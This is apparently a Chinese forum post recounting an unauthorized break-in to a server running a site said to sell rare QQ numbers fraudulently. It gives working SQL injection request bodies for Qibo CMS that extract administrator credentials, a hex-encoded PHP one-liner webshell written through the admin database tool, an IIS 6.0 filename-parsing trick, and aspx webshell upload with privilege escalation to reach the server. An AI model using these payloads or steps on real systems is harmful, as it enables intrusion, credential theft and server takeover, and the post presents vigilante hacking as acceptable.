入侵卖靓号QQ骗子网站服务器纪实
<p align="left" style="margin:0cm 0cm 0.0001pt;text-align:left;"><br />
</p>
<p align="left" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<b><span style="background:white;color:#444444;font-family:宋体;">一、踩点寻找漏洞</span></b><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:red;font-family:宋体;">闲来无事,在各个</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">QQ</span><span style="background:white;color:red;font-family:宋体;">靓号群求买</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">5</span><span style="background:white;color:red;font-family:宋体;">位</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">QQ</span><span style="background:white;color:red;font-family:宋体;">,寻问半天无果就在百度搜索</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">5</span><span style="background:white;color:red;font-family:宋体;">位</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">QQ</span><span style="background:white;color:red;font-family:宋体;">扫号找到</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">“</span><span style="background:white;color:red;font-family:宋体;">目标</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">”</span><span lang="EN-US"><a href="http://www.qq.com/" target="_blank"><span style="background:white;color:#333333;font-family:Verdana,sans-serif;">www.qq.com</span></a></span><span style="background:white;color:red;font-family:宋体;">,打开一看就一静态页面,哇好多靓号啊,</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">90000000,300000,98888888</span><span style="background:white;color:red;font-family:宋体;">,</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">199999999</span><span style="background:white;color:red;font-family:宋体;">,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">100</span><span style="background:white;color:red;font-family:宋体;">字,然后开始撕逼,然后就有了下文。。。。</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:red;font-family:宋体;">随手拿御剑扫了一下好多</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">php</span><span style="background:white;color:red;font-family:宋体;">页面,随手加一个</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">member</span><span style="background:white;color:red;font-family:宋体;">发现是齐博</span><span lang="EN-US" style="background:white;color:red;font-family:Verdana,sans-serif;">1.0</span><span style="background:white;color:red;font-family:宋体;">的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用</span><span style="background:white;color:#444444;font-family:宋体;">方法如下:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">先注册一个用户,记住注册时候的邮箱以</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">uid</span><span style="background:white;color:#444444;font-family:宋体;">号,</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="600" height="413" src="https://www.2k8.org/content/uploadfile/202203/17/63eef8f3.png" alt="3-1.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="600" height="461" src="https://www.2k8.org/content/uploadfile/202203/17/ca5c196e.png" alt="3-2.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">然后我们打开火狐浏览器简单构造一下,</span><span lang="EN-US"><a href="http://www.qq.com/member/userinfo.php?job=edit&step=2" target="_blank"><span style="background:white;color:#333333;font-family:Verdana,sans-serif;">http://www.qq.com/member/userinfo.php?job=edit&step=2</span></a></span><span style="background:white;color:#444444;font-family:宋体;">,发送数据包如下:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
<span style="background:white;">truename=xxxx%0000&Limitword=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23</span><br />
</span><span style="background:white;color:#444444;font-family:宋体;">这里的</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">email</span><span style="background:white;color:#444444;font-family:宋体;">和</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">uid</span><span style="background:white;color:#444444;font-family:宋体;">一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="600" height="282" src="https://www.2k8.org/content/uploadfile/202203/17/dbc48d39.png" alt="3-3.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">truename=xxxx%0000&Limitword=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="600" height="262" src="https://www.2k8.org/content/uploadfile/202203/17/e9ac2a6f.png" alt="3-4.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="background:white;color:#444444;font-family:宋体;">解密进后台如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="601" height="406" src="https://www.2k8.org/content/uploadfile/202203/17/cce9d32e.png" alt="3-5.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
<br />
</span><b><span style="background:white;color:#444444;font-family:宋体;">二、后台</span></b><b><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">getwebshell</span></b><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;"> </span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">进了后台,以前齐博有个后台</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">getwebshell</span><span style="background:white;color:#444444;font-family:宋体;">漏洞,在系统功能</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">- </span><span style="background:white;color:#444444;font-family:宋体;">单篇文章独立页面管理</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">-</span><span style="background:white;color:#444444;font-family:宋体;">增加页面添加个</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">webshell</span><span style="background:white;color:#444444;font-family:宋体;">,如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><img width="601" height="452" src="https://www.2k8.org/content/uploadfile/202203/17/7abbb87b.png" alt="3-6.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="background:white;color:#444444;font-family:宋体;">然后点确定,添加提示</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><img width="600" height="330" src="https://www.2k8.org/content/uploadfile/202203/17/f87769a4.png" alt="3-7.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="background:white;color:#444444;font-family:宋体;">由于是</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">ii6.0</span><span style="background:white;color:#444444;font-family:宋体;">的所以我们可以考虑一下解析漏洞,我们再来如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><img width="600" height="456" src="https://www.2k8.org/content/uploadfile/202203/17/496065f4.png" alt="3-8.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">改静态页面为</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">help.php;.htm</span><span style="background:white;color:#444444;font-family:宋体;">,然后我们发现访问</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">help.php;.htm</span><span style="background:white;color:#444444;font-family:宋体;">是</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">404</span><span style="background:white;color:#444444;font-family:宋体;">(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">root</span><span style="background:white;color:#444444;font-family:宋体;">,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">hex</span><span style="background:white;color:#444444;font-family:宋体;">编码一下,</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;"><?php assert($_POST);?></span><span style="background:white;color:#444444;font-family:宋体;">编码以后是:</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA</span><span style="background:white;color:#444444;font-family:宋体;">网站目录是</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">D:\wwwroot\qq.com\admin\</span><span style="background:white;color:#444444;font-family:宋体;">,注意我们要把</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">\</span><span style="background:white;color:#444444;font-family:宋体;">改成</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">/,</span><span style="background:white;color:#444444;font-family:宋体;">否则不成功</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">D:/wwwroot/qq.com/admin/,</span><span style="background:white;color:#444444;font-family:宋体;">下面我们来导一下</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="600" height="255" src="https://www.2k8.org/content/uploadfile/202203/17/a4eb98d5.png" alt="3-9.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="601" height="350" src="https://www.2k8.org/content/uploadfile/202203/17/2095fbfe.png" alt="3-10.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="background:white;color:#444444;font-family:宋体;">之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">xiese</span><span style="background:white;color:#444444;font-family:宋体;">打开</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><img width="600" height="472" src="https://www.2k8.org/content/uploadfile/202203/17/d1f227e9.png" alt="3-11.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><b><span style="background:white;color:#444444;font-family:宋体;">三、提权进服务器</span></b><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">经测试</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">xise</span><span style="background:white;color:#444444;font-family:宋体;">下一句话只有在</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">admin</span><span style="background:white;color:#444444;font-family:宋体;">目录下有权限浏览,且不能执行命令,庆幸的是支持</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">aspx</span><span style="background:white;color:#444444;font-family:宋体;">,那么我们就上一个</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">aspx</span><span style="background:white;color:#444444;font-family:宋体;">大马,然后执行命令提示拒绝访问,哈哈在</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">c:\windows\temp</span><span style="background:white;color:#444444;font-family:宋体;">下上传</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">cmd.exe</span><span style="background:white;color:#444444;font-family:宋体;">然后执行</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">systeminfo</span><span style="background:white;color:#444444;font-family:宋体;">,发现打了</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">400</span><span style="background:white;color:#444444;font-family:宋体;">多补丁,如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="600" height="555" src="https://www.2k8.org/content/uploadfile/202203/17/5dc301ee.png" alt="3-12.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="background:white;color:#444444;font-family:宋体;">啧啧啧,这么多补丁,我都没去试试今年和</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">2014</span><span style="background:white;color:#444444;font-family:宋体;">年放出来的</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">exp</span><span style="background:white;color:#444444;font-family:宋体;">,而且是在咱们大</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">00</span><span style="background:white;color:#444444;font-family:宋体;">下载了一个变异</span><span lang="EN-US" style="background:white;color:#444444;font-family:Verdana,sans-serif;">pr</span><span style="background:white;color:#444444;font-family:宋体;">,然后上传提权如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><img width="599" height="355" src="https://www.2k8.org/content/uploadfile/202203/17/87b34de8.png" alt="3-13.png" style="vertical-align:middle;" /><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="background:white;color:#444444;font-family:宋体;">然后登陆服务器如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><img width="600" height="418" src="https://www.2k8.org/content/uploadfile/202203/17/463ea215.png" alt="3-14.png" style="vertical-align:middle;" /><span lang="EN-US" style="font-family:宋体;font-size:12.0pt;"></span>
</p>
<p style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="background:white;color:#444444;font-family:宋体;">难怪普通刀连接不上,原来是有狗。</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
<br />
</span><span lang="EN-US"></span>
</p>
<p>
<br />
</p>
页:
[1]